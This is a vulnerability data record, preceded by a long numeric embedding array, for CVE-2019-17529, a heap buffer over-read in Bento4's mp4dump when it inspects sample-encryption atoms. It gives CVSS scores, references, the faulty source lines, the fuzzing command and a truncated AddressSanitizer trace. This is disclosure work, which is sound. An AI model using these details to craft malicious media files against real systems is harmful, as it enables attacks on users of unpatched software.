-0.004605816211551428, -0.0005423855618573725, -0.003454362042248249, 0.03161708638072014, 0.0010537776397541165, 0.00643536914139986, 0.001321448478847742, -0.0063414499163627625, 0.011172672733664513, -0.010256017558276653, -0.0069988868199288845, 0.011668568477034569, -0.008114651776850224, 0.03354055806994438, -0.015988867729902267, 0.00459078885614872, -0.005124252289533615, 0.009632391855120659, 0.024268819019198418, -0.0031369137577712536, -0.015335188247263432, 0.0003226137487217784, 0.016379574313759804, -0.0033022123388946056, 0.009151523932814598, 0.01401280052959919, -0.011706136167049408, -0.023246973752975464, 0.0017365729436278343, -0.00643536914139986, -0.022901348769664764, 0.002663559280335903, -0.0054886601865291595, 0.02429887279868126, 0.019971057772636414, 0.02219507470726967, 0.0005663350457325578, -0.000025196861315635033, -0.010594128631055355, -0.010443856939673424, -0.024945039302110672, 0.004192569758743048, -0.008828439749777317, 0.020542088896036148, -0.02150382660329342, 0.0020887714345008135, -0.00821232795715332, -0.0071228607557713985, -0.004726033192127943, -0.0334804505109787, 0.0037755670491605997, -0.018197856843471527, 0.005725337192416191, -0.019580353051424026, 0.005045359488576651, -0.0007020488264970481, -0.0016952482983469963, 0.01770196110010147, 0.018648670986294746, -0.029633505269885063, -0.00803951546549797, -0.008294977247714996, -0.001895297085866332, 0.00955725647509098, 0.0029490746092051268, 0.006292611826211214, 0.017747042700648308, 0.011548351496458054, 0.012104354798793793, 0.004639626946300268, -0.013464310206472874, -0.017130929976701736, -0.007513565942645073, 0.010699317790567875, -0.011195213533937931, 0.023216919973492622, 0.01825796626508236, 0.011518296785652637, 0.0007541741942986846, 0.013156253844499588, -0.02267594262957573, 0.0068749128840863705, 0.004429247230291367, 0.011803812347352505, 0.009376930072903633, 0.003645957913249731, -0.003262766171246767, 0.015027131885290146, 0.004763600882142782, -0.003052386222407222, 0.007708918768912554, 0.0004963649553246796, 0.0017562960274517536, 0.001977946376428008, -0.011375539004802704, 0.0021883260924369097, -0.0008006643620319664, -0.007336997427046299, 0.01876888796687126, -0.011743703857064247, 0.038259077817201614, 0.0012040489818900824, -0.005684012547135353, 0.024208709597587585, -0.015853624790906906, -0.0000471652383566834, -0.008572978898882866, -0.012472519651055336, 0.03564435616135597, -0.003952135797590017, 0.00410616397857666, 0.008310004137456417, -0.016995687037706375, -0.011901488527655602, 0.01373479887843132, -0.013471824117004871, -0.006750938948243856, -0.02028662897646427, -0.0009993042331188917, -0.001588180079124868, 0.006814804393798113, 0.021233337000012398, 0.005931960418820381, -0.0018689995631575584, 0.0038920273073017597, 0.01583859696984291, 0.0020399331115186214, -0.00802448857575655, -0.03393126279115677, 0.014350911602377892, -0.00730694318190217, -0.01238987036049366, 0.0011345484526827931, -0.014395992271602154, -0.00753986369818449, -0.0010049394331872463, 0.0018361277179792523, 0.0027424516156315804, -0.017386391758918762, 0.01631946489214897, 0.022480590268969536, -0.004643383901566267, 0.02219507470726967, 0.02160901576280594, 0.0024212466087192297, 0.016544872894883156, 0.019309865310788155, 0.00594323081895709, -0.016650062054395676, 0.0024813550990074873, 0.013652149587869644, 0.0007438430329784751, 0.0014613886596634984, -0.002556490944698453, 0.007055238354951143, 0.006514261942356825, -0.009444552473723888, 0.0238180048763752, -0.004233894404023886, -0.01028607226908207, -0.0010133922332897782, -0.022555725648999214, -0.0092341722920537, 0.029558369889855385, 0.012743008323013783, 0.0026259913574904203, -0.018062612041831017, -0.0059394738636910915, 0.010894671082496643, -0.002323570428416133, 0.018558507785201073, -0.00847530271857977, -0.0057065533474087715, 0.009752608835697174, -0.005225685425102711, 0.008775845170021057, 0.012773062102496624, -0.01591373234987259, -0.004635870456695557, -0.016003895550966263, 0.004042298533022404, -0.037567831575870514, -0.0007659141556359828, 0.014035341329872608, -0.009106442332267761, -0.020827604457736015, 0.01373479887843132, 0.0038431889843195677, 0.004478085320442915, -0.005507444031536579, 0.01842326484620571, -0.00413246126845479, -0.009474607184529305, -0.0069988868199288845, -0.0005869973683729768, -0.022931404411792755, 0.01465145405381918, 0.01420063991099596, 0.0036722554359585047, 0.00783664919435978, 0.0020436900667846203, -0.011165158823132515, 0.015898706391453743, -0.01216446328908205, 0.002086892956867814, -0.004508139565587044, 0.0010011827107518911, 0.015012104995548725, 0.0020230277441442013, 0.0005095137166790664, -0.015447892248630524, 0.004327814094722271, -0.01756671816110611, 0.018618617206811905, -0.016815360635519028, -0.0024907472543418407, 0.012750521302223206, 0.03910059854388237, 0.005075413733720779, -0.014027828350663185, 0.01487686112523079, -0.01687547005712986, 0.00753986369818449, 0.025696396827697754, 0.006236259825527668, 0.010143314488232136, 0.007047724910080433, -0.013351607136428356, -0.00020709267118945718, -0.0006085988716222346, 0.0055412547662854195, -0.007130374200642109, -0.01002309750765562, 0.021804368123412132, 0.0008598337299190462, 0.020512035116553307, 0.012066787108778954, -0.021563934162259102, -0.0022503130603581667, -0.014786697924137115, -0.015019618906080723, -0.022405454888939857, 0.014350911602377892, -0.004241407848894596, -0.026943648234009743, 0.00642034225165844, -0.011090023443102837, -0.004012244287878275, 0.008738277480006218, 0.006589397322386503, 0.013832475058734417, 0.022736050188541412, 0.008813412860035896, -0.019039375707507133, -0.000744312652386725, -0.03308974578976631, -0.0035745790228247643, -0.01777709648013115, 0.021864477545022964, 0.002349867718294263, -0.001559064956381917, 0.023307081311941147, -0.011195213533937931, -0.018543481826782227, 0.003694796236231923, 0.02118825726211071, 0.031046055257320404, 0.010233476758003235, 0.012945874594151974, -0.020527062937617302, 0.0004818074230570346, -0.014982051216065884, 0.004192569758743048, -0.004233894404023886, 0.002120703924447298, -0.00988785270601511, 0.004109920468181372, 0.00480492552742362, 0.0021883260924369097, 0.006262557115405798, 0.001189021859318018, -0.011428133584558964, 0.006923750974237919, -0.01594378799200058, -0.017266174778342247, -0.014320856891572475, -0.003059899900108576, -0.02547098882496357, -0.0024287602864205837, -0.004985250998288393, 0.003159454558044672, 0.002203353215008974, -0.00575539143756032, -0.01011325977742672, -0.018077639862895012, 0.017236120998859406, -0.005691526457667351, 0.01684541441500187, -0.012780576013028622, -0.007479755207896233, -0.011052455753087997, -0.005883122328668833, -0.015402810648083687, 0.014245721511542797, 0.0023010296281427145, -0.015928760170936584, -0.008843467570841312, 0.0016097815241664648, -0.015282593667507172, -0.01597384177148342, 0.016229303553700447, 0.00433157104998827, -0.0049664671532809734, -0.010684290900826454, 0.009083901531994343, 0.004767357837408781, -0.0059807985089719296, -0.003841310739517212, -0.025891749188303947, 0.0022634617052972317, 0.014230694621801376, 0.00037567829713225365, -0.013231390155851841, 0.016620008274912834, -0.0071904826909303665, 0.006292611826211214, -0.011352998204529285, -0.024960067123174667, -0.015432864427566528, 0.00009984825010178611, -0.03272909298539162, 0.0006071900716051459, 0.003014818299561739, 0.0059545012190938, -0.004237651359289885, -0.0037117016036063433, 0.0015769096789881587, 0.000019165463527315296, 0.010496451519429684, -0.0003604163648560643, 0.0016914915759116411, -0.0022709753829985857, 0.01770196110010147, -0.0014210031367838383, -0.018333101645112038, -0.010263531468808651, -0.006551829632371664, 0.01145818829536438, 0.006360233761370182, -0.012525114230811596, -0.01378739345818758, 0.010496451519429684, 0.029152637347579002, -0.0007560526137240231, 0.011315430514514446, -0.0036703769583255053, -0.009790176525712013, -0.006829831749200821, 0.011826353147625923, 0.015312647446990013, 0.010361207649111748, -0.006709614302963018, 0.012712953612208366, -0.020872686058282852, 0.0027781410608440638, -0.006014609709382057, 0.007216780446469784, -0.009549742564558983, 0.0038187699392437935, -0.005616390611976385, -0.007445944007486105, -0.004395436029881239, 0.002580909989774227, 0.02363767847418785, 0.005804229993373156, -0.0038300403393805027, -0.006273827515542507, 0.024043411016464233, -0.0011768123367801309, -0.017446501180529594, -0.022751078009605408, 0.008708222769200802, 0.00014991912757977843, -0.021353553980588913, -0.0024419089313596487, 0.02374286949634552, -0.0016971267759799957, 0.02688353881239891, -0.0060897450894117355, 0.023096702992916107, 0.017401419579982758, 0.025621259585022926, 0.0010979198850691319, -0.006510504987090826, 0.011480729095637798, 0.014967023395001888, 0.008219840936362743, 0.0008020731620490551, -0.01946013607084751, -0.018438290804624557, 0.00022528957924805582, -0.006315152160823345, 0.011676081456243992, -0.013937665149569511, -0.003955892752856016, 0.01642465591430664, 0.006976346019655466, 0.005402253940701485, -0.004767357837408781, -0.02366773411631584, 0.017927369102835655, -0.01573340781033039, 0.002115068957209587, -0.011360512115061283, -0.008107137866318226, 0.008204814046621323, -0.02619229070842266, 0.010872130282223225, 0.011225267313420773, -0.006296368315815926, -0.01309614535421133, 0.0037229720037430525, -0.021804368123412132, -0.015064699575304985, 0.00644663954153657, 0.0018220398342236876, 0.022510644048452377, -0.004158759023994207, -0.0010162098333239555, 0.011533323675394058, -0.0020643523894250393, 0.026147209107875824, -0.024629469960927963, 0.011187699623405933, -0.02284124121069908, -0.0019685542210936546, -0.002582788234576583, 0.001979824621230364, -0.00684110214933753, -0.01974565163254738, 0.002761235460639, 0.013930151239037514, -0.00006668290006928146, -0.032248225063085556, -0.01812272146344185, 0.025170447304844856, -0.011383052915334702, 0.011954084038734436, -0.020181437954306602, -0.010564073920249939, 0.005383470095694065, 0.017581744119524956, -0.008655628189444542, -0.024659523740410805, 0.0005245408392511308, -0.0018060734728351235, 0.0038300403393805027, -0.002552733989432454, -0.0009584492654539645, -0.0024494226090610027, -0.03426185995340347, 0.014899401925504208, -0.024343954399228096, 0.013915124349296093, -0.012795602902770042, -0.02592180296778679, -0.006405314896255732, -0.026973702013492584, 0.005642688367515802, -0.006502991542220116, 0.017055794596672058, -0.02233031764626503, -0.000012752517250191886, -0.02108306623995304, -0.005082927644252777, -0.025110337883234024, 0.031797412782907486, 0.002220258815214038, 0.005807986482977867, 0.0016473493305966258, -0.01368220429867506, -0.011984137818217278, -0.006961319129914045, -0.0027988033834844828, -0.0022916377056390047, -0.0207073874771595, -0.030279671773314476, -0.004083623178303242, -0.0035952413454651833, 0.0096624456346035, -0.023036593571305275, -0.024449143558740616, 0.0109547795727849, -0.0054886601865291595, 0.026117155328392982, 0.0011833866592496634, 0.008588005788624287, 0.013592041097581387, -0.03462251275777817, 0.01753666251897812, 0.005394740495830774, 0.023081675171852112, -0.0029453178867697716, -0.0027424516156315804, 0.00732572702690959, 0.023111728951334953, -0.003803742816671729, -0.017897315323352814, -0.0016032072016969323, 0.003035480622202158, -0.00003146305971313268, -0.002128217602148652, 0.0051317657344043255, -0.012119381688535213, 0.024178655818104744, 0.018318073824048042, 0.003858216106891632, -0.0035595519002527, -0.012712953612208366, 0.012863225303590298, -0.014305830001831055, -0.008835953660309315, -0.0043465979397296906, -0.0018098301952704787, -0.0006954744458198547, -0.0027837762609124184, -0.01216446328908205, 0.004109920468181372, 0.03402142599225044, -0.022044802084565163, -0.004297759849578142, 0.018889104947447777, 0.01701071299612522, -0.023352162912487984, -0.0034111589193344116, 0.024975093081593513, -0.0032665228936821222, 0.012637818232178688, -0.0022709753829985857, -0.00461708614602685, 0.01567329838871956, 0.011999164707958698, 0.002772505860775709, 0.004391679540276527, 0.0012820021947845817, -0.00591693352907896, 0.008798385970294476, 0.0040047308430075645, 0.0011721162591129541, -0.02964853122830391, -0.012314734980463982, 0.023427298292517662, 0.03750772029161453, 0.023697787895798683, 0.018828997388482094, 0.0011871434981003404, -0.015237512066960335, -0.016003895550966263, 0.03116627223789692, 0.004921386018395424, 0.0017187282210215926, -0.0020305411890149117, 0.022525671869516373, 0.004515653010457754, -0.019550299271941185, 0.002988521009683609, -0.01326895784586668, -0.022555725648999214, -0.014178099110722542, 0.009113955311477184, -0.008790872059762478, 0.025696396827697754, -0.006179908290505409, -0.015192430466413498, 0.039671629667282104, 0.00735202431678772, -0.02536579966545105, 0.008993738330900669, -0.011082509532570839, 0.015019618906080723, 0.006082231644541025, -0.004170028958469629, -0.007630026433616877, -0.003674133913591504, 0.0028532766737043858, -0.000031022809707792476, -0.031316544860601425, -0.006803533993661404, -0.005221928469836712, -0.013607067987322807, -0.02028662897646427, -0.012885766103863716, 0.018348127603530884, -0.0017346945824101567, 0.006375260651111603, 0.006938778329640627, -0.0030580214224755764, -0.012262139469385147, 0.013058577664196491, -0.018002504482865334, -0.020872686058282852, -0.0072994292713701725, -0.01237484347075224, -0.0001914785389089957, 0.008234868757426739, 0.01513232197612524, 0.0039032974746078253, 0.0038018643390387297, 0.019520245492458344, 0.0023667733184993267, -0.004354111384600401, -0.0010237233946099877, 0.013118686154484749, -0.00982023123651743, 0.01825796626508236, 0.0004660759004764259, -0.014087936840951443, -0.024118546396493912, -0.0061310697346925735, -0.021699178963899612, 0.014936969615519047, -0.0010678655235096812, -0.01287073828279972, 0.03858967497944832, 0.004902601707726717, 0.024689577519893646, -0.018693752586841583, 0.00009568056702846661, 0.02578655816614628, -0.008655628189444542, -0.027559760957956314, -0.024028385058045387, -0.002115068957209587, 0.0035727007780224085, -0.014065396040678024, 0.006965075619518757, -0.013381660915911198, -0.0016135383630171418, 0.017446501180529594, -0.017281202599406242, 0.02374286949634552, -0.009519687853753567, 0.00036065117456018925, -0.0058981492184102535, -0.002539585344493389, -0.012171977199614048, -0.0009232294396497309, -0.01513232197612524, -0.014065396040678024, -0.029423125088214874, 0.003816891461610794, 0.014050368219614029, 0.01852845400571823, -0.01209684181958437, -0.01567329838871956, 0.00066119380062446, -0.022104911506175995, 0.008009461686015129, 0.012322247959673405, 0.0027499652933329344, 0.0114732151851058, 0.006044663954526186, -0.010466397739946842, 0.020752469077706337, 0.021864477545022964, -0.01791234128177166, 0.009602337144315243, 0.013742312788963318, 0.009579796344041824, -0.020181437954306602, 0.025140391662716866, -0.0035125920549035072, -0.013809934258460999, 0.010368721559643745, -0.007708918768912554, -0.010346180759370327, -0.016274383291602135, -0.0009556316654197872, 0.027409488335251808, -0.019099485129117966, -0.001526193111203611, -0.001005878672003746, -0.018062612041831017, 0.013088632375001907, 0.009241686202585697, 0.0012284680269658566, 0.032007791101932526, 0.0037304856814444065, 0.005642688367515802, -0.024554334580898285, 0.03299958258867264, 0.017176011577248573, 0.03227828070521355, 0.010203422978520393, -0.023412272334098816, 0.00891860295087099, -0.0032702796161174774, 0.010398775339126587, -0.006938778329640627, -0.02523055486381054, 0.022660914808511734, 0.0035069570876657963, 0.014508696272969246, -0.01684541441500187, -0.020512035116553307, -0.007265618536621332, -0.006499234586954117, 0.0032984556164592505, 0.0014294559368863702, 0.010857103392481804, 0.00503784604370594, 0.013937665149569511, 0.006510504987090826, 0.01891915872693062, -0.0016745860921218991, -0.00938444398343563, -0.007949353195726871, 0.00016142426466103643, 0.0008325970266014338, 0.0016191734466701746, 0.012652845121920109, -0.0007893940201029181, -0.001204988220706582, -0.005484903231263161, -0.011120078153908253, 0.006397801451385021, -0.0030899541452527046, -0.018723806366324425, -0.012532628141343594, -0.007622512988746166, -0.0013186308788135648, 0.02792041189968586, 0.019595380872488022, -0.000003246829010095098, -0.019505217671394348, -0.006101015489548445, 0.020557116717100143, -0.010796994902193546, 0.002597815589979291, -0.00779908150434494, 0.007175455801188946, 0.005143036134541035, -0.012998469173908234, 0.005646444857120514, 0.0020098788663744926, -0.0013101780787110329, 0.003508835332468152, -0.03272909298539162, -0.013997773639857769, 0.015064699575304985, 0.004962710198014975, -0.01100737415254116, -0.013900097459554672, -0.007829136215150356, 0.016409628093242645, -0.013208849355578423, -0.011713649146258831, -0.0016811604145914316, -0.004692221991717815, 0.01870878040790558, 0.03143675997853279, 0.007874216884374619, -0.0068072909489274025, -0.00783664919435978, 0.004463058430701494, 0.0109547795727849, 0.01335912011563778, -0.011029914952814579, 0.010594128631055355, -0.006179908290505409, -0.014921942725777626, -0.0010800751624628901, 0.009737581945955753, 0.011969110928475857, 0.013637122698128223, 0.017927369102835655, -0.004620843101292849, 0.00798692088574171, 0.0035952413454651833, -0.020301654934883118, -0.0051580630242824554, -0.013156253844499588, -0.0013618338853120804, -0.008032002486288548, 0.005398497451096773, 0.0036985529586672783, 0.007949353195726871, 0.007329483516514301, -0.0030749270226806402, -0.003255252493545413, -0.004556977655738592, -0.001762870466336608, 0.003148184157907963, -0.028205927461385727, 0.005545011721551418, 0.011225267313420773, 0.008843467570841312, 0.007821622304618359, -0.018002504482865334, 0.010240990668535233, -0.011368025094270706, 0.0005118616973049939, 0.026703214272856712, 0.004703492391854525, -0.010391262359917164, 0.01773201674222946, -0.00524446927011013, -0.014493669383227825, 0.005860581528395414, -0.003997216932475567, -0.0018643036019057035, -0.0035144705325365067, -0.019324891269207, -0.026387644931674004, -0.009542228654026985, 0.0057366075925529, -0.010015583597123623, 0.003929594997316599, 0.011969110928475857, -0.01278808992356062, -0.007303186226636171, -0.00936941709369421, 0.02443411760032177, 0.014869347214698792, 0.03531375899910927, 0.014380965381860733, 0.0013439891627058387, 0.00912898313254118, 0.020557116717100143, 0.017371363937854767, 0.009497147984802723, -0.017747042700648308, 0.04351857304573059, -0.0036910392809659243, -0.01349436491727829, -0.011555864475667477, -0.0007292855298146605, -0.006397801451385021, 0.00035055482294410467, -0.030084319412708282, 0.0027706273831427097, -0.0012341032270342112, 0.036395713686943054, 0.01048893854022026, -0.0015816056402400136, 0.0179423950612545, -0.010173368267714977, 0.0035896061453968287, 0.01266787201166153, 0.03260887786746025, -0.00251892302185297, 0.008820926770567894, -0.001334597123786807, -0.0032064144033938646, 0.0407235287129879, 0.008467788808047771, -0.014861833304166794, 0.009211632423102856, -0.010721858590841293, 0.007104076910763979, -0.008760818280279636, 0.018453318625688553, -0.013554473407566547, 0.011991651728749275, 0.024449143558740616, -0.0025921803899109364, -0.02733435295522213, 0.002740573137998581, 0.00480492552742362, -0.0022878809832036495, 0.0013909488916397095, -0.012810629792511463, 0.013058577664196491, -0.021248364821076393, -0.0004710066714324057, -0.002847641473636031, -0.0015524906339123845, 0.007904271595180035, -0.011954084038734436, -0.006852372083812952, -0.0006541498587466776, 0.005672742612659931, 0.011187699623405933, 0.006487964186817408, 0.004444274120032787, 0.013396688736975193, -0.005161819979548454, -0.018588563427329063, 0.0006799777038395405, 0.01908445730805397, -0.004000973887741566, -0.011067482642829418, -0.015898706391453743, -0.01123278122395277, -0.0069312648847699165, 0.012585223652422428, 0.00620244862511754, 0.020376792177557945, 0.02595185674726963, -0.01489188801497221, -0.0019056282471865416, 0.009046333841979504, 0.00873076356947422, 0.013824962079524994, 0.018408237025141716, 0.02022651955485344, -0.011563378386199474, 0.01753666251897812, 0.013126200065016747, -0.0055299848318099976, 0.018588563427329063, 0.006292611826211214, 0.01211186870932579, -0.002580909989774227, 0.04066342115402222, 0.006067204754799604, 0.021548908203840256, 0.016229303553700447, -0.02281118743121624, 0.006055934354662895, -0.0027443300932645798, 0.010000556707382202, 0.0022258940152823925, 0.01461388636380434, -0.004560734611004591, -0.026357589289546013, 0.013216362334787846, -0.00027213196153752506, 0.010676776990294456, -0.001413489575497806, -0.007085292600095272, -0.005112981889396906, -0.010173368267714977, 0.004782384727150202, 0.018272992223501205, -0.010616668500006199, -0.0036722554359585047, 0.00216954224742949, 0.0008842528332024813, 0.009068874642252922, 0.027484625577926636, -0.01006066519767046, 0.013381660915911198, -0.005950744263827801, -0.00570279685780406, 0.016064004972577095, -0.04613329470157623, 0.012720467522740364, -0.014606372453272343, -0.006919994484633207, 0.005481146275997162, -0.009985528886318207, -0.015012104995548725, -0.005004034843295813, -0.02895728312432766, 0.0001688204356469214, 0.0059545012190938, -0.0022597049828618765, 0.0007762453169561923, -0.00503784604370594, 0.0002939682744909078, -0.027349380776286125, -0.010699317790567875, 0.012254626490175724, -0.0040723527781665325, 0.012720467522740364, -0.011600946076214314, 0.02387811243534088, -0.008001947775483131, 0.008986225351691246, -0.01123278122395277, 0.00849032960832119, -0.022736050188541412, -0.011638513766229153, -0.020091276615858078, -0.016725197434425354, -0.013824962079524994, -0.0054473355412483215, 0.007438430562615395, 0.0137197719886899, -0.0123372757807374, 0.0024813550990074873, -0.0030899541452527046, -0.0015562473563477397, -0.005894392728805542, -0.0028119520284235477, 0.01470404863357544, 0.010173368267714977, 0.022991511970758438, -0.017762070521712303, 0.013193822465837002, 0.030775567516684532, 0.011398079805076122, 0.026237372308969498, -0.018062612041831017, 0.006946291774511337, -0.0041963267140090466, 0.0014087936142459512, -0.004068595822900534, -0.020061220973730087, 0.010218449868261814, -0.0033285098616033792, 0.00410616397857666, 0.014102963730692863, 0.01444107387214899, -0.005105467978864908, 0.0033040905836969614, 0.00824989564716816, 0.002165785524994135, -0.014553777873516083, -0.0018906011246144772, -0.0022766105830669403, -0.01770196110010147, 0.0023742869962006807, 0.018062612041831017, -0.013126200065016747, -0.017686935141682625, -0.019925978034734726, 0.009617364965379238, 0.007904271595180035, 0.014328370802104473, -0.017506608739495277, 0.011352998204529285, 0.0009415437234565616, 0.007829136215150356, -0.018648670986294746, -0.008640601299703121, 0.009474607184529305, 0.006157367490231991, -0.01628941111266613, -0.0028081953059881926, -0.007675107568502426, -0.03161708638072014, -0.013870042748749256, 0.012074301019310951, -0.006758452858775854, -0.006307638715952635, -0.004921386018395424, 0.003696674481034279, -0.00506414333358407, -0.004079866223037243, 0.015793515369296074, 0.0036572283133864403, 0.015988867729902267, -0.016620008274912834, 0.010586614720523357, 0.01076694019138813, 0.016890496015548706, 0.013802421279251575, 0.001932864892296493, 0.004147488623857498, 0.002919020364060998, -0.007475998252630234, 0.0061686378903687, -0.004297759849578142, -0.02187950536608696, 0.002888966118916869, -0.02139863558113575, -0.005890635773539543, -0.014824265614151955, 0.011210240423679352, 0.00798692088574171, 0.00459078885614872, -0.000993669149465859, -0.00938444398343563, 0.017581744119524956, 0.02039181813597679, -0.0007053360459394753, -0.023216919973492622, -0.0068335882388055325, 0.004508139565587044, -0.002603450557217002, -0.011127591133117676, 0.0029359259642660618, 0.0534965917468071, 0.021924585103988647, 0.009331849403679371, 0.030865728855133057, -0.01151078287512064, -0.015335188247263432, 0.0036515931133180857, -0.005924446973949671, -0.0013627730077132583, -0.026763321831822395, 0.006363990250974894, -0.0005428551230579615, 0.02142869122326374, -0.0016313830856233835, 0.0010162098333239555, -0.02339724451303482, -0.005834284238517284, -0.020436899736523628, 0.00046490191016346216, -0.005646444857120514, 0.0042226240038871765, 0.004714762791991234, 0.025996938347816467, 0.020782524719834328, 0.005338388495147228, 0.007859189994633198, 0.004102407023310661, 0.014576318673789501, 0.012660359032452106, -0.030084319412708282, -0.009940448217093945, -0.01607903093099594, 0.0034656324423849583, -0.00732572702690959, 0.004756087437272072, 0.02201474830508232, -0.020902741700410843, 0.0179423950612545, 0.010308613069355488, -0.0033209961839020252, 0.0198508407920599, 0.006814804393798113, -0.00940698478370905, -0.03369082883000374, 0.00686739943921566, -0.008242381736636162, 0.015763461589813232, -0.006224989425390959, 0.005079170688986778, 0.01956532523036003, 0.005792959593236446, 0.02850646898150444, 0.0002547568583395332, 0.01304355077445507, 0.0071904826909303665, -0.003674133913591504, 0.01332155242562294, -0.010398775339126587, -0.008422707207500935, 0.002718032570555806, -0.009542228654026985, -0.015042159706354141, -0.010053151287138462, 0.01597384177148342, -0.010518992319703102, 0.01940002851188183, 0.020061220973730087, 0.02906247414648533, -0.009970501996576786, 0.014313342981040478, -0.00732572702690959, -0.006311395671218634, -0.01573340781033039, -0.0008128739427775145, -0.008933629840612411, -0.0027086406480520964, 0.018303047865629196, -0.026838457211852074, -0.015297620557248592, 0.016094058752059937, 0.029693612828850746, 0.006904967129230499, -0.015988867729902267, -0.004594545811414719, -0.005800473038107157, 0.005319604650139809, -0.027349380776286125, -0.018783915787935257, -0.03471267595887184, 0.01349436491727829, 0.0011984137818217278, 0.020767496898770332, 0.002548977266997099, -0.013584527187049389, 0.005041602998971939, -0.004793655127286911, 0.006630721967667341, 0.019595380872488022, 0.0035238624550402164, -0.009324335493147373, 0.013607067987322807, -0.005278280004858971, 0.004444274120032787, -0.013501877896487713, -0.004812438972294331, 0.010503965429961681, -0.01011325977742672, -0.004812438972294331, 0.003955892752856016, 0.005026575643569231, 0.02115820161998272, -0.005849311128258705, -0.0029359259642660618, 0.013021009974181652, 0.005372199695557356, 0.029858911409974098, -0.018693752586841583, 0.00985028501600027, 0.017416445538401604, 0.007028941065073013, -0.007216780446469784, 0.010053151287138462, 0.006330179516226053, 0.00206247391179204, 0.023442326113581657, -0.00983525812625885, -0.011984137818217278, 0.019204674288630486, 0.003895784029737115, 0.014365938492119312, 0.0018060734728351235, -0.007645053323358297, 0.012089327909052372, 0.013291498646140099, 0.004850007127970457, 0.010534019209444523, -0.007412132807075977, 0.04051314666867256, 0.005774175748229027, 0.025275636464357376, -0.009061360731720924, 0.06371504068374634, -0.005522470921278, 0.0011824474204331636, -0.032699041068553925, 0.002186447847634554, -0.0039070541970431805, -0.0025715180672705173, -0.016199247911572456, -0.01891915872693062, 0.020662305876612663, 0.013156253844499588, 0.01118018664419651, -0.002719910815358162, -0.009797690436244011, -0.004883817862719297, -0.003721093526110053, 0.005236955359578133, -0.006285097915679216, 0.011916515417397022, 0.0057366075925529, 0.006777236703783274, 0.0023254486732184887, 0.0009607972460798919, 0.023787951096892357, 0.019144566729664803, 0.0081973010674119, 0.0035727007780224085, 0.005274523515254259, 0.0014473006594926119, -0.02366773411631584, -0.022044802084565163, -0.011488243006169796, -0.0034318212419748306, 0.028942257165908813, 0.0013186308788135648, 0.000316039368044585, -0.0037267287261784077, -0.005759148392826319, 0.006063447799533606, 0.0065330457873642445, 0.003193265525624156, -0.028115764260292053, 0.038018643856048584, 0.02073744311928749, -0.0032815500162541866, -0.01719103939831257, -0.0029246555641293526, -0.0016323222080245614, -0.0016079031629487872, 0.016695143654942513, 0.00045034437789581716, 0.00007378556620096788, 0.004865034017711878, -0.031977735459804535, 0.017025740817189217, -0.003176360158249736, -0.0014350911369547248, 0.045291777700185776, -0.003279671538621187, -0.005353415850549936, -0.021308474242687225, 0.004669681191444397, 0.006991373375058174 ]
3,051
CVE-2019-17529
2019-10-12T20:15:11.567000
An issue was discovered in Bento4 1.5.1.0. There is a heap-based buffer over-read in AP4_CencSampleEncryption::DoInspectFields in Core/Ap4CommonEncryption.cpp when called from AP4_Atom::Inspect in Core/Ap4Atom.cpp.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/TeamSeri0us/pocs/tree/master/bento4" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/430" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:1.5.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "83B32974-D913-4DDB-844F-C58D55ECC17E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/axiomatic-systems/Bento4/issues/430
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "axiomatic-systems", "Bento4" ]
# bento4 ## version bento4 1.5.1.0 ## description ```txt None ``` ## download link None ## others please send email to [email protected] if you have any questions. --------------------- ## AP4_CencSampleEncryption::[email protected]___heap-buffer-overflow ### description An issue was discovered in bento4 1.5.1.0, There is a/an heap-buffer-overflow in function AP4_CencSampleEncryption::DoInspectFields at Ap4CommonEncryption.cpp-3437 ### commandline mp4dump --verbosity 2 @@ ### source ```c 3433 info += 2; 3434 for (unsigned int j=0; j<num_entries; j++) { 3435 unsigned int bocd = AP4_BytesToUInt16BE(info); 3436 AP4_FormatString(header, sizeof(header), "sub-entry %04d.%d bytes of clear data", i, j); 3437 inspector.AddField(header, bocd); 3438 unsigned int boed = AP4_BytesToUInt32BE(info+2); 3439 AP4_FormatString(header, sizeof(header), "sub-entry %04d.%d bytes of encrypted data", i, j); 3440 inspector.AddField(header, boed); 3441 info += 6; 3442 } ``` ### bug report ```txt ================================================================= ==20093==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61300000dfee at pc 0x00000060256b bp 0x7ffdb67cdb90 sp 0x7ffdb67cdb80 READ of size 4 at 0x61300000dfee thread T0 #0 0x60256a in AP4_CencSampleEncryption::DoInspectFields(AP4_AtomInspector&) /src/bento4/Source/C++/Core/Ap4CommonEncryption.cpp:3437 #1 0x4d3dae in AP4_Atom::Inspect(AP4_AtomInspector&) /src/bento4/Source/C++/Core/Ap4Atom.cpp:263 #2 0x58b005 in AP4_AtomListInspector::Action(AP4_Atom*) const /src/bento4/Source/C++/Core/Ap4Atom.h:530 #3 0x58b005 in AP4_List<AP4_Atom>::Apply(AP4_List<AP4_Atom>::Item::Operator const&) const 